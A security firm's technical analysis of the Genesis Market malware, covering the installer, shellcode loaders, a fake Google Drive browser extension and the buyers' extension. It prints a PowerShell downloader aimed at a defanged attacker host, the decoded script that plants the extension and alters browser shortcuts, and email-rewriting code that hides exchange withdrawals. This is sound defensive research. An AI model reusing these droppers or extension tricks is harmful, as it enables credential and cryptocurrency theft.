
Technical analysis of the Genesis Market

5 April 2023 at 00:00

For the last couple of weeks we’ve assisted the Dutch police in investigating the Genesis Market. In case you are unfamiliar with this market: it was used to sell stolen login credentials, browser cookies and online fingerprints (the latter to evade ‘risky sign-in’ detections), a model some refer to as IMPaaS, or Impersonation-as-a-Service. The market appears to have started in 2018 and its activities have resulted in approximately two million victims. If you want to know more about this operation, you can read our other blog post. You can also check whether your data has been compromised by the market operators via the website of the Dutch police.

In order to operate this market, victims were infected with malware that would steal all data from their browser. The malware was persistent, so that any new information added to the browser later could be stolen as well. Buyers would receive access to a custom Chromium build or browser extension which could load the stolen information of a victim.

We helped the police by analysing the malware that was installed on victims’ machines and the browser that was made accessible to buyers. The focus was to determine the infection chain of the victim. Additionally, we looked at the browser available to buyers, to see if it would give new insights into the methods used by the market or the buyers. The victim in this case was infected in the second half of February.

Due to the short timespan in which this research had to be conducted, some details may be missing or not 100% accurate. We’ve been careful to mention any uncertainties in this article. It should nevertheless give more insight into how this market operated, and can hopefully give future researchers a head start if this market ever relaunches. In addition, it highlights a trend of attackers switching from stealing credentials to stealing session cookies, to cope with the increased adoption of multi-factor and risk-based authentication.

This analysis starts with a write-up of the infection chain and an analysis of the malware that gets dropped. In the second half we dig deeper into the buyers’ browser extension and how it can be fingerprinted. In case you are interested, Trellix also has a write-up of the exploit chain for one of the other victims.

The infection

Stage one: the loader

The infection we investigated started (ironically) because the victim wanted to activate his or her anti-virus product. Rather than paying for a subscription, the victim downloaded an illegal activation crack. This ended up uninstalling the original AV product and installing malware instead…

The activation crack came as an executable, setup.exe, packed in a ZIP file. Looking at the creation date, the file seems to have been created the day before, possibly to bypass any new AV detection rules. The file is 444 MB in size, but the last 439 MB are all set to 0.
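As an aside, trailing zero padding like this is trivial to strip when triaging such inflated samples; a quick Python sketch (the file names are ours):

# Strip the trailing zero bytes so the ~5 MB of real content is easier to handle.
data = open("setup.exe", "rb").read()
open("setup_trimmed.exe", "wb").write(data.rstrip(b"\x00"))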

Upon further investigation, setup.exe appeared to be an Inno Setup-generated installer, with the packaged data being the malicious payload. Luckily, we could quickly test this hypothesis and make use of a wide array of tools to investigate the installer package further:

Using innoextract, a listing of the packaged files can be retrieved:

$ innoextract -e ./setup.exe -d extracted
Extracting "Ino JCcq7ie Supsup" - setup data version 6.1.0 (unicode)
 - "tmp/jcoigasjioqeg.dll" [temp]
 - "tmp/yvibiajwi.dll" [temp]
 - "tmp/isgoisegjoqwg.dll" [temp]

And looking at the file signatures:

$ cd extracted && file tmp/*
isgoisegjoqwg.dll: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1080, components 3

jcoigasjioqeg.dll: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2023:02:09 01:02:17], progressive, precision 8, 3840x2160, components 3

yvibiajwi.dll:     PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

The two images seem unrelated to the actual malware. They are a picture of a pride flag and a picture of LeBron James.

Setup images

yvibiajwi.dll stood out because multiple identical copies of that DLL appeared in the directories created by setup.exe on the victim’s machine, while neither of the other two files did.

Additionally, the second stage executable setup.tmp loads yvibiajwi.dll at some point. More specifically, the following high level sequence of actions takes place:

  1. setup.exe creates a new directory, referred to as the setup temp directory from here on, with the format is-<5 uppercase random alphanumeric>.tmp in the directory retrieved by GetTempPath()
  2. setup.exe writes another executable, setup.tmp to the setup temp directory
  3. setup.exe launches setup.tmp with the command line argument /SL5="$B0638,3246841,963072,<path to setup.exe>"
  4. setup.tmp opens the setup.exe file, reads data from it and writes yvibiajwi.dll to the setup temp directory
  5. setup.tmp launches setup.exe with the command line argument /VERYSILENT
  6. setup.exe creates a new setup temp directory and writes setup.tmp to the new directory then launches it with a similar /SL5 command line argument
  7. setup.tmp reads yvibiajwi.dll from the packaged data in setup.exe and writes it to the most recently created setup temp directory
  8. setup.tmp loads yvibiajwi.dll

The second invocation with /VERYSILENT hides all of the installer’s windows, per Inno Setup’s documentation. Keeping Inno Setup’s intended purpose in mind, the above flow seems unusual: it would not be standard functionality unless extra code were embedded in the generated installer. So is there?

Embedded PascalScript

Inno Setup supports adding specialized tasks to a generated installer beyond simply unpacking the contents. An installer script can define user-selectable tasks in the [Tasks] section, or programs to execute in the [Run] section. Additionally, an installer script can specify custom code in PascalScript to customize the (un-)installation process. setup.exe indeed includes an embedded compiled script which defines a function to be called on setup initialization. Using innounp and IFPSTools.NET, the embedded PascalScript can be unpacked and decompiled for analysis:

.version 23

.entry !MAIN

.type primitive(Pointer) Pointer
.type primitive(U32) U32
.type primitive(Variant) Variant
.type primitive(PChar) PChar
.type primitive(Currency) Currency
.type primitive(Extended) Extended
.type primitive(Double) Double
.type primitive(Single) Single
.type primitive(S64) S64
.type primitive(String) String
.type primitive(U32) U32_2
.type primitive(S32) S32
.type primitive(S16) S16
.type primitive(U16) U16
.type primitive(S8) S8
.type(export) funcptr(void()) ANYMETHOD
.type primitive(String) String_2
.type primitive(UnicodeString) UnicodeString
.type primitive(UnicodeString) UnicodeString_2
.type primitive(String) String_3
.type primitive(UnicodeString) UnicodeString_3
.type primitive(WideString) WideString
.type primitive(WideChar) WideChar
.type primitive(WideChar) WideChar_2
.type primitive(Char) Char
.type primitive(U8) U8
.type primitive(U16) U16_2
.type primitive(U32) U32_3
.type(export) primitive(U8) BOOLEAN
.type primitive(U8) U8_2
.type(export) class(TWIZARDFORM) TWIZARDFORM
.type(export) class(TMAINFORM) TMAINFORM

.global(import) TMAINFORM MAINFORM

.function(export) void !MAIN()

.function(import) external dll("shell32.dll","ShellExecuteW") __stdcall returnsval shell32.dll!ShellExecuteW(__in __unknown,__in __unknown,__in __unknown,__in __unknown,__in __unknown,__in __unknown)

.function(import) external dll("files:yvibiajwi.dll","RedrawElipse") __cdecl void files:yvibiajwi.dll!RedrawElipse(__in __unknown)

	pushtype S32 ; StackCount = 1
	pushtype S32 ; StackCount = 2
	pushtype S32 ; StackCount = 3
	pushtype S32 ; StackCount = 4
	pushtype S32 ; StackCount = 5
	pushtype String_3 ; StackCount = 6
	pushtype S32 ; StackCount = 7
	pushtype S32 ; StackCount = 8
	pushtype S32 ; StackCount = 9
	pushvar RetVal ; StackCount = 10
	pop ; StackCount = 9
	assign Var1, S32(3490579)
	assign Var4, S32(6006047)
	add Var4, Var1
	assign Var8, S32(2538214)
	add Var8, Var1
	assign Var4, S32(0)
	pushtype BOOLEAN ; StackCount = 10
	assign Var10, RetVal
	setz Var10
	sfz Var10
	pop ; StackCount = 9
	jf loc_245
	pushtype BOOLEAN ; StackCount = 10
	pushtype S32 ; StackCount = 11
	pushtype S32 ; StackCount = 12
	assign Var12, S32(5)
	pushtype UnicodeString_2 ; StackCount = 13
	assign Var13, UnicodeString_3("")
	pushtype UnicodeString_2 ; StackCount = 14
	assign Var14, UnicodeString_3("/VERYSILENT")
	pushtype UnicodeString_2 ; StackCount = 15
	pushtype UnicodeString_2 ; StackCount = 16
	assign Var16, UnicodeString_3("{srcexe}")
	pushvar Var15 ; StackCount = 17
	pop ; StackCount = 16
	pop ; StackCount = 15
	pushtype UnicodeString_2 ; StackCount = 16
	assign Var16, UnicodeString_3("")
	pushtype S32 ; StackCount = 17
	assign Var17, S32(0)
	pushvar Var11 ; StackCount = 18
	call shell32.dll!ShellExecuteW
	pop ; StackCount = 17
	pop ; StackCount = 16
	pop ; StackCount = 15
	pop ; StackCount = 14
	pop ; StackCount = 13
	pop ; StackCount = 12
	pop ; StackCount = 11
	le Var10, Var11, S32(32)
	pop ; StackCount = 10
	sfz Var10
	pop ; StackCount = 9
	jf loc_203
	assign Var5, S32(3391624)
	assign Var7, S32(840271)
	add Var7, Var1
	add Var7, S32(24673)
	assign Var7, S32(128817)
	assign RetVal, BOOLEAN(1)
	assign Var9, S32(4775799)
	assign Var6, UnicodeString_3("HqKTEgDM0D2xEzOpyamSPdX")
	jump loc_325
	assign Var9, S32(2482010)
	assign Var2, S32(1011875)
	assign Var9, S32(498847)
	assign Var4, S32(1795972)
	pushtype S32 ; StackCount = 10
	assign Var10, S32(490102)
	call files:yvibiajwi.dll!RedrawElipse
	pop ; StackCount = 9
	assign Var6, UnicodeString_3("cbdmPSyrpKqYV1")
	assign Var5, S32(1512452)
	pushtype UnicodeString_3 ; StackCount = 10
	assign Var10, Var6
	add Var10, UnicodeString_3("eIfOyEgNLbgUddEtLD")
	assign Var6, Var10
	pop ; StackCount = 9

.function(import) external internal returnsval WIZARDSILENT()

.function(import) external internal returnsval EXPANDCONSTANT(__in __unknown)

The functionality implemented by the above script matches the observed behavior: when not running silently, the installer relaunches itself with /VERYSILENT, and once it executes in silent mode, it invokes a function called RedrawElipse in yvibiajwi.dll, which kicks off the next stage of the infection chain.

Diving into yvibiajwi.dll

The DLL seems to be written in C++. Upon loading this DLL in IDA, we’re finally met with our first taste of control flow obfuscation in the infection chain so far:


The obfuscation techniques applied are limited to runs of bogus Windows/libc API calls that are guarded by an always false if condition or empty loops, so it’s relatively simple to ignore them:


With the control flow cleaned up a bit, we can finally tell that the DLL is another dropper which loads a piece of shellcode and executes it. However, the shellcode is not executed on DLL load: DllMain only sets up a few pointers and allocates memory for the shellcode, nothing else. In order to execute the embedded shellcode, the exported RedrawElipse function has to be called with the first argument set to 0x77A76 (490102 in decimal). Of course, this is exactly how the function is invoked in the embedded PascalScript in setup.exe:

	pushtype S32 ; StackCount = 10
	assign Var10, S32(490102)
	call files:yvibiajwi.dll!RedrawElipse

Once invoked, RedrawElipse eventually calls crypt32.dll!CryptStringToBinaryA to decode the embedded base64 shellcode block. It then decrypts the decoded block using what seems to be a custom 64-bit block cipher with a hardcoded key then executes the decrypted shellcode.

The shellcode then decrypts an embedded loader executable using the eXtended Tiny Encryption Algorithm (XTEA) block cipher and uses process hollowing to inject it into a newly spawned explorer.exe process. Afterwards, the injected loader downloads a file from http://194.135.33[.]96/rozemarin.exe, which gets renamed to svchost.exe and executed. It also executes a PowerShell script which downloads some more resources. Both are described in more detail hereafter.
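XTEA itself is a published algorithm; for reference, here is its standard block decryption as a minimal Python sketch (the sample’s actual key, chaining mode and any tweaks are not reproduced here):

# Standard XTEA block decryption (Needham/Wheeler): one 64-bit block as two
# 32-bit words, with a key of four 32-bit words.
def xtea_decrypt_block(v0, v1, key, rounds=32):
    mask, delta = 0xFFFFFFFF, 0x9E3779B9
    s = (delta * rounds) & mask
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & mask
        s = (s - delta) & mask
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & mask
    return v0, v1

# e.g. xtea_decrypt_block(0xDEADBEEF, 0xCAFEBABE, [0x11111111] * 4)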

Taking a closer look at svchost.exe

All of the stages prior to the one that loaded this executable involved dropping a static next stage in some shape or form. However, this executable was downloaded and is therefore one of the first elements of the infection chain that might differ from one campaign to the next. Case in point: after extracting the previous stage’s executable, we found a matching submission (by hash) on VirusTotal. Linked to that submission is a VMRay analysis report showing a different hash for the svchost.exe executable than the one acquired from the victim’s filesystem.

Focusing on this svchost.exe version: it sets off another series of nested encrypted shellcode stages. The first stage is decrypted and executed, which sets up and executes the second stage, and so on. Each stage is encrypted differently:

  1. The first stage is encrypted using the Tiny Encryption Algorithm (TEA) block cipher.
  2. The second stage is encrypted using a custom cipher.
  3. The third and final stage is an executable that is embedded in plaintext in the second stage.

Interestingly, the final stage is executed through “self PE injection”. This is achieved by having the second stage shellcode replace the PE of its own process, namely the svchost.exe executable, with the embedded final stage’s PE. Afterwards, relocations are updated to match those of the final stage PE, and the second stage shellcode jumps to the now-mapped final stage executable’s entry point.

While analyzing the final executable, we noticed considerable similarity between it and a DLL found on the victim’s machine which matched the Danabot malware. This makes sense, as we learned that the Genesis Market relied on multiple known botnets in the past. AZORult, Gootkit and Arkei also seem linked to prior infections. We suspected Danabot because both pieces of code are written in Delphi and are heavily obfuscated using almost identical techniques. We were able to find a much stronger link when analysing the chain starting from svchost.exe dynamically:

Dropped and executed DLL by the malicious svchost.exe

The screenshot above shows that at some point svchost.exe writes the malicious Qruhaepdediwhf.dll DLL to the user’s %TMP% directory and loads it using rundll32.exe. Shortly after doing so, svchost.exe’s process exits while the rundll32.exe process that loaded the malicious DLL continues. Furthermore, we found that the Qruhaepdediwhf.dll file from the victim’s device and the one dropped in the analysis detonation run are almost identical, except for what seems to be a randomly generated hex-encoded identifier at offset 0x0050695C (exact identifiers modified):

$ diff <(hexdump -C original_Qruhaepdediwhf.dll) <(hexdump -C dropped_Qruhaepdediwhf.dll)
< 00506950  04 55 41 00 0c 55 41 00  14 55 41 00 41 41 41 41  |.UA..UA..UA.AAAA|
< 00506960  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
< 00506970  41 41 41 41 41 41 41 41  41 41 41 41 7a 7a 00 00  |AAAAAAAAAAAAzz..|
> 00506950  04 55 41 00 0c 55 41 00  14 55 41 00 42 42 42 42  |.UA..UA..UA.BBBB|
> 00506960  42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42  |BBBBBBBBBBBBBBBB|
> 00506970  42 42 42 42 42 42 42 42  42 42 42 42 7a 7a 00 00  |BBBBBBBBBBBBzz..|

At this stage, we stopped analysing the infection chain further since the links between the artefacts on the victim’s device and the suspected initial infection vector have been sufficiently clarified. The remainder of this document focuses on the parts of the malware that are more strongly related to the market’s illicit activities.

Downloading remote resources

As mentioned earlier, the final loader executable that is executed by the decoded shellcode in yvibiajwi.dll not only drops svchost.exe, but also runs the following PowerShell command:

$w = new-object System.Net.Webclient;
$bs = $w.DownloadString("http://tchk-1[.]com/v3.bs64");

[Byte[]] $x=[Convert]::FromBase64String($bs.Replace("!", "A").Replace("@", "W").Replace("$", "x").Replace("%", "y").Replace("^", "z"));

for ($i = 0; $i -lt $x.Count; $i++) {
    $x[$i] = ($x[$i] -bxor 255) -bxor 11
}

This downloads a new PowerShell command from the remote host tchk-1[.]com, which gets executed. Further analysis of this host revealed that it is just a proxy (using HAProxy), forwarding requests to other hosts.

Besides v3.bs64 there seem to be other versions as well, such as 5.ps1. In general, these scripts either contain the encoded files inline or download them separately. The files constitute an unpacked browser extension, which (in the case of our victim) gets saved in $localAppData\Default. The script then iterates over all start menu items, looking for shortcuts to Chromium-based browsers such as Google Chrome and Brave. It modifies these shortcuts by appending --load-extension=<extension path>, so that the just-dropped extension gets loaded.

Below you can find the decoded version of v3.bs64, though encoded data has been removed for readability:

$strangeDesktop = [Environment]::GetFolderPath("CommonDesktopDirectory")
$programFiles = [Environment]::GetFolderPath("ProgramFiles")
$appData = [Environment]::GetFolderPath("ApplicationData")
$userProfile = [Environment]::GetFolderPath("UserProfile")
$localAppData = [Environment]::GetFolderPath("LocalApplicationData")

$encodedData = @{"src/functions/exchangeSettings.js"="..."...}

$destination = "$localAppData\Default"

if (-not (Test-Path $destination)) {
    New-Item $destination -ItemType Directory | Out-Null
}

foreach ($item in $encodedData.GetEnumerator()) {
    $decodedContent = [System.Convert]::FromBase64String($item.Value)
    $filePath = Join-Path $destination $item.Key
    $directoryPath = Split-Path $filePath -Parent
    if (-not (Test-Path $directoryPath)) {
        New-Item $directoryPath -ItemType Directory | Out-Null
    }
    [System.IO.File]::WriteAllBytes($filePath, $decodedContent)
}

$startMenuPrograms = @(
    "$appData\Microsoft\Internet Explorer\Quick Launch"
)

$braveWorkingFolder = "$programFiles\BraveSoftware\Brave-Browser\Application"
$chromeWorkingFolder = "$programFiles\Google\Chrome\Application"
$operaGXWorkingFolder = "$localAppData\Programs\Opera GX"
$extensionPath = "$localAppData\Default"
$shell = New-Object -ComObject WScript.Shell

Get-ChildItem -Path $startMenuPrograms -Filter *.lnk -Recurse -Force |
    Where-Object {
        $link = $shell.CreateShortcut($_.FullName)
        $link.WorkingDirectory -eq $braveWorkingFolder -or
        $link.WorkingDirectory -eq $chromeWorkingFolder -or
        $link.WorkingDirectory -eq $operaGXWorkingFolder
    } |
    ForEach-Object {
        $link = $shell.CreateShortcut($_.FullName)
        $link.Arguments = "$($link.Arguments) --load-extension=`"$extensionPath`""
        $link.Save()  # required to persist the change; this call is our reconstruction
    }

Stop-Process -Name "chrome" -Force
Stop-Process -Name "opera" -Force
Stop-Process -Name "brave" -Force

The victim’s browser extension: Google Drive

We believe the extension that gets dropped and loaded into Chrome is directly related to the market. It poses as Google Drive, as can be seen in its manifest.json:

  "offline_enabled": true,
  "name": "Google Drive",
  "author": "Google inc.",
  "description": "Google Drive: create, share and keep all your stuff in one place.",
  "version": "1.8.7",
  "icons": {
    "128": "ico.png"
  "permissions": [
  "manifest_version": 3,
  "background": {
    "service_worker": "./src/background.js",
    "type": "module"
  "host_permissions": [
  "content_scripts": [
      "matches": [
      "all_frames": true,
      "js": [
      "run_at": "document_start"
  "declarative_net_request": {
    "rule_resources": [
        "id": "disable-csp",
        "enabled": false,
        "path": "rules.json"

It injects several content scripts and declares rewrite rules that disable the Content Security Policy. The extension itself consists of multiple JavaScript files, for which no effort was made at obfuscation. Let’s take a closer look at its features. Below you can see a file listing of the extension, which already paints a picture of what to expect:

$ find . -type f

Somewhat surprisingly, the discovered extension includes an analytics service, using the following (partially elided) URL:

https://c8fc9104534a411a83cbe61…@…[.]io/4504639321407488

In a later version of the extension we analysed, this reference was removed.

Command and Control

The first thing we noticed was how the extension determines its C2 server. For this it relies on monitoring outgoing transactions of a single Bitcoin address (bc1qtms60m4fxhp5v229kfxwd3xruu48c4a0tqwafu), using the JSON API of a public blockchain explorer. This address has made a single transaction, to the legacy Bitcoin address 1C56HRwPBaatfeUPEYZUCH4h53CoDczGyF. That address can be Base58-decoded, resulting in the domain you-rabbit[.]com, which is then contacted as the C2 server.
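To illustrate the decoding step, here is a minimal Python sketch (our assumption: the domain sits zero-padded in the 20-byte hash field of the address; the address is the one observed above):

# Base58-decode a legacy Bitcoin address and read the 20-byte hash field as ASCII.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def base58_decode(address):
    n = 0
    for char in address:
        n = n * 58 + ALPHABET.index(char)
    # A legacy address is 25 bytes: version (1) + payload (20) + checksum (4).
    return n.to_bytes(25, "big")

decoded = base58_decode("1C56HRwPBaatfeUPEYZUCH4h53CoDczGyF")
print(decoded[1:21].rstrip(b"\x00"))  # expected: b'you-rabbit.com'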

Since this transaction took place on February 6th, 2023, prior infections must have used either a different technique or a different Bitcoin address to determine the C2 host. To check, we downloaded a copy of the Bitcoin transaction database from January and decoded all legacy addresses to see if we could find any similar ones, but this did not result in any matches. This could indicate that the technique was only adopted in the last few months.

Oh no! There is something wrong with my Bitcoin wallet

One of the things the extension monitors for is emails you might receive from various crypto exchanges. When it finds one, it rewrites the email to make it look less suspicious, for example by changing an email about a withdrawal into an email about a new sign-in:

if (window.location.href.indexOf('mail.google.com') > -1) {
    const binance = () => {
        let items = $(document).find(':contains("Withdrawal Requested")').filter(function () {
            return $(this).children().length === 0;
        });

        for (const item of items) {
            $(item).text(`[Binance] Authorize New Device`)
        }

        items = $(document).find('span:contains("Memo:")')

        for (const item of items) {
            $(item).html(`<span class="Zt">&nbsp;-&nbsp;</span>Authorize New Device You recently attempted to sign in to your Binance account from a new device or location. As a security measure, we require additional confi.`)
        }

        items = $($(document).find('div:contains("Memo:")').filter(function () {
            return $(this).children().length === 0;
        }))

        for (const item of items) {
            const code = $($(item).find('div[style*="font-size:20px"]')[1]).find('div').text()
            // …

They have support for Gmail, Hotmail/Outlook and Yahoo and seem to monitor emails from Binance, Bybit, Huobi, Okx, Kraken, KuCoin and Bittrex.

Since they don’t actually check the domain name, but rather whether a hostname such as ‘mail.google.com’ appears anywhere in the URL, we can use this to detect if a user is infected with this extension:

<script type="text/javascript">

if (window.location.href.indexOf("") === -1) {
	window.location.href = window.location.href + "";

setTimeout(function analyze() {
	var checks = [];
	// The + is needed to avoid this element itself being modified!
	checks.push(document.getElementById("binance").innerText !== "Withdrawal " + "Requested");
	checks.push(document.getElementById("huobi").innerText !== "Подтвердите " + "запрос на вывод средств");
	checks.push(document.getElementById("okx").innerText !== "Verification " + "Code Of Withdrawal");
	checks.push(document.getElementById("kraken").innerText !== "Confirm " + "your new withdrawal address");
	checks.push(document.getElementById("kucoin").innerText !== "KuCoin " + "Verification Code");
	checks.push(document.getElementById("bitget").innerText !== "Add " + "withdrawal address");
	checks.push(document.getElementById("bittrex").innerText !== "Please " + "Confirm Your Withdrawal");

	var found = 0;

	for (i in checks) {
		if (checks[i]) found += 1;

	if (found === 0) {
		document.getElementById('result').innerText = "Good news! The malicious browser extension was not detected.";
	} else {
		document.getElementById('result').innerHTML = "Bad news! We also detected this extension on your system. We would advice you to go to the website of the <a href=''>Dutch police</a>, where they can assist you further.";
}, 2000)


<p style="display: none;" id="binance">Withdrawal Requested</p>
<p style="display: none;" id="huobi">Подтвердите запрос на вывод средств</p>
<p style="display: none;" id="okx">Verification Code Of Withdrawal</p>
<p style="display: none;" id="kraken">Confirm your new withdrawal address</p>
<p style="display: none;"id="kucoin">KuCoin Verification Code</p>
<span style="display: none;" id="bitget">Add withdrawal address</span>
<p style="display: none;" id="bittrex">Please Confirm Your Withdrawal</p>

<div id="result">Checks still running...</div>

This script is embedded on this page, and the result is:

Deputizing the victim’s browser - request proxying

Another interesting feature of the malicious browser extension is the ability to proxy HTTP requests through the victim’s browser. This feature can be enabled at any time by the C2 server using the aptly-named proxy command (more on the other supported commands later). In addition, the feature can also be enabled during registration with the C2 server if isEnabledProxy is set to true in the JSON-formatted response of the registration endpoint at https://{c2.domain}/api/machine/init.

When enabled, the proxy feature attempts to set up a WebSocket connection to another C2 server, whose address is relayed by the main C2 server in the response to https://{c2.domain}/api/machine/settings; the WebSocket connection uses port 4343. Once set up, the proxy submodule waits for commands from its associated C2 server, which can be one of the following:

  • HTTP_REQUEST request a URL through the victim’s browser, adding the victim’s own cookies, using the fetch() API
  • AUTH provide the uuid of the malicious extension’s instance
  • GET_COOKIES get a copy of all the cookies

Requests made by the C2 server through the HTTP_REQUEST command occur within the context of the extension, making them invisible to victims. We were able to test this specific subset of the functionality by creating our own set of emulated C2 servers, allowing us to see the proxy functionality in action by asking the extension to make a request to http://localhost:8080/test2:

HTTP_REQUEST message sent by the emulated C2 server to the browser extension

As a result, the extension indeed issued a request to http://localhost:8080/test2:

Requests from the extension to localhost:8080/test2
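For reference, the emulated proxy C2 can be as simple as a small WebSocket server. Below is a rough Python sketch; the JSON message format shown is simplified and assumed, not taken verbatim from the malware (requires the websockets package):

# Minimal stand-in for the proxy C2: accept the extension's WebSocket
# connection and ask it to fetch a URL through the victim's browser.
import asyncio, json
import websockets  # pip install websockets

async def handler(ws):
    await ws.send(json.dumps({"command": "HTTP_REQUEST",           # assumed format
                              "url": "http://localhost:8080/test2"}))
    print(await ws.recv())  # whatever the extension proxies back

async def main():
    async with websockets.serve(handler, "0.0.0.0", 4343):  # port per the above
        await asyncio.Future()                               # serve forever

asyncio.run(main())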

Despite the existence of this proxy feature, its intended use case remains a mystery to us. From the point of view of features available to market users, the buyers’ extension - which is elaborated on later in this write-up - makes no reference to this feature. There is the possibility to set a SOCKS5 proxy in the extension settings page, but that does not seem related to the malicious extension’s proxy feature. Additionally, the user manual only mentions the SOCKS5 proxy feature.

It may be the case that proxying through the victim’s machine is possible for bot buyers, perhaps through a SOCKS5 interface exposed by the Danabot-like malware that’s deployed as part of the infection chain. However, we do not have enough information to make any definitive conclusions on whether these features are available to buyers or not.

Other functionality

Besides rewriting emails and proxying requests, the C2 server can send the following commands to the victim:

  • extension enable or disable a certain browser extension
  • info get information about the victim’s machine (e.g. WebGL machine details)
  • push send a push notification
  • cookies get a copy of all cookies
  • screenshot send back a screenshot of the page currently open in the browser
  • url open a URL in the browser
  • current_url send back the URL of the current tab
  • history send back the browser history
  • injects download a new set of rules from the server, which specify extra JavaScript to execute on certain domains
  • settings get a new settings object from the server, specifying for example which links it should grab

Analysis of the browser (extension) for buyers

Buyers on the market get access to a Chromium extension (as a .crx file) and a browser (based on ungoogled-chromium) with the extension preinstalled. This extension makes it easy to import bought fingerprints and cookies.

General functionality

The extension, once activated, allows buyers to automatically import bought fingerprints and cookies. Furthermore, it allows for the setup of a SOCKS5-based proxy. The plugin can be seen in action in the GIF below.

Browser in action

Analyzing the source code

This extension is heavily obfuscated, making it difficult to determine exactly how it works and what features it offers. We combined the analysis of the source code with dynamic analysis in an isolated VM.

The extension requires a large list of permissions, for example, allowing it full access to all visited pages. The full list of permissions is:

"permissions": ["<all_urls>", "tabs", "storage", "unlimitedStorage", "cookies", "webNavigation", "webRequestBlocking", "webRequest", "browsingData", "privacy", "background", "bookmarks", "downloads", "clipboardRead", "clipboardWrite", "contentSettings", "contextMenus", "history", "idle", "management", "pageCapture", "topSites", "system.cpu", "system.memory", "", "declarativeContent", "activeTab", "power", "desktopCapture", "proxy"],

This list contains a number of permissions for which it is not clear what functionality they are intended for, such as desktopCapture, system.cpu and power.

When the extension is installed, users need to activate it using an “activation code”. When a code is entered, the browser sends a POST request to the following URL:


If this request fails, it tries again with the following URL:


This request contains a multipart body with 3 variables: a, v and i. Each field is encrypted and included as binary data. The encryption of the activation key (the field a) works as follows:

  • The activation key is encoded as a JSON string (enclosed in double quotes).
  • This string is URL-encoded (replacing the double quotes with %22, etc.).
  • This result is then compressed using deflate (the compression algorithm used by zlib, but without a zlib header).
  • Then, a key and IV are generated. This uses the OpenSSL EVP_BytesToKey KDF with a random 8-character salt and the hard-coded password liauyd(o*!&@#ijKj@!#asdg2134.
  • The compressed data is encrypted using AES-CBC with the generated key and IV and with PKCS7 padding.
  • The data submitted in the request is the random salt followed by the cipher text.

The parameters v and i are encrypted in a similar way, but with a different password. The password is generated by taking the activation key, swapping the case of all letters (replacing lowercase characters with uppercase characters and vice versa) and appending the string asdg2134.
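Putting this together, here is a minimal Python sketch of the scheme as we reconstructed it (assumptions: EVP_BytesToKey with OpenSSL’s default MD5 digest and a single iteration, a 32-byte key with a 16-byte IV, random salt bytes, and pycryptodome for AES; none of these details are confirmed beyond the description above):

import json, os, urllib.parse, zlib
from hashlib import md5
from Crypto.Cipher import AES            # pycryptodome
from Crypto.Util.Padding import pad

MASTER_PASSWORD = b"liauyd(o*!&@#ijKj@!#asdg2134"

def evp_bytes_to_key(password, salt, key_len=32, iv_len=16):
    # OpenSSL's EVP_BytesToKey KDF, assuming its default MD5 digest and count=1.
    d, prev = b"", b""
    while len(d) < key_len + iv_len:
        prev = md5(prev + password + salt).digest()
        d += prev
    return d[:key_len], d[key_len:key_len + iv_len]

def encrypt_field(value, password):
    # JSON-encode, URL-encode, raw-deflate, then AES-CBC with PKCS7 padding.
    encoded = urllib.parse.quote(json.dumps(value)).encode()
    deflater = zlib.compressobj(wbits=-15)   # deflate without a zlib header
    compressed = deflater.compress(encoded) + deflater.flush()
    salt = os.urandom(8)                     # "8-character salt"; bytes assumed
    key, iv = evp_bytes_to_key(password, salt)
    ciphertext = AES.new(key, AES.MODE_CBC, iv).encrypt(pad(compressed, 16))
    return salt + ciphertext                 # salt is prepended to the data

activation_key = "EXAMPLEKEY"                # hypothetical value
a = encrypt_field(activation_key, MASTER_PASSWORD)
# v and i use the case-swapped activation key plus "asdg2134" as the password:
secondary = activation_key.swapcase().encode() + b"asdg2134"
v = encrypt_field({"v": "7.2"}, secondary)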

The parameter v contains the version number of the plugin (currently 7.2), as a JSON dictionary:

{"v": "7.2"}

The parameter i contains certain fingerprinting data about the browser and extension, such as the user agent, OS details and a list of the removable drives on the user’s machine. We don’t see any way this could be relevant for the extension’s operation, so it is likely included to monitor and track the buyers:

  "p": {
    "p": {
      "a": "aarch64",
      "b": "",
      "c": "",
      "d": 6
    "m": {
      "a": 4113801216
    "s": {
      "a": {
        "c": [],
        "a": [
        "b": []
    "i": {
      "a": {
        "c": [],
        "a": [
        "b": []
  "j": {
    "c": "9a3bd3e8cebf17110f689f58a4a1f43e",
    "w": "6c14da109e294d1e8155be8aa4b1ce8e",
    "s": "Chrome 111",
    "p": {
      "ua": "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36",
      "browser": {
        "name": "Chrome",
        "version": "",
        "major": "111"
      "engine": {
        "version": "537.36",
        "name": "WebKit"
      "os": {
        "name": "Linux",
        "version": "aarch64"
      "device": {},
      "cpu": {}
    "a": "ad449aba7595468941c6d3b6aad54a4fc76797aa",
    "t": {
      "s": 0,
      "b": 1

The server can reverse this process by first decrypting the activation code, generating the same key and IV using the salt. Then the activation code can be used to decrypt the v and i fields.

Jumping through all these hoops does give us an ‘activated’ extension:

Activated extension

At regular intervals, the extension will submit its activation code again (specified by renew_interval/renew_enabled). This request contains the same variables as the first activation request with 3 additional fields: b, e and d. The exact meaning of these fields has not yet been determined.

While the code is obfuscated, the settings reveal some of its functionality. We managed to obtain the following configuration object from the extension:

  "pl_version": "7.2",
  "sel_pl_version": "7.2",
  "options_version": "7.2",
  "available_versions": [
  "storage_key": "ext_set",
  "enabled": true,
  "useragent": null,
  "renew_enabled": true,
  "renew_interval": 3600000,
  "renew_onstartup": true,
  "sync": false,
  "proxy_enabled": false,
  "proxy": {
    "ip": false,
    "port": false,
    "type": false
  "settings": {
    "bf": false
  "exceptions_list": [
  "links_domain_sync": [
  "link_path_sync": "/security/",
  "link_path_bots": "/client/bots",
  "link_path_profile": "/client/account/profile",
  "links_domain_shop": [
  "keep_domains": "\\\\",
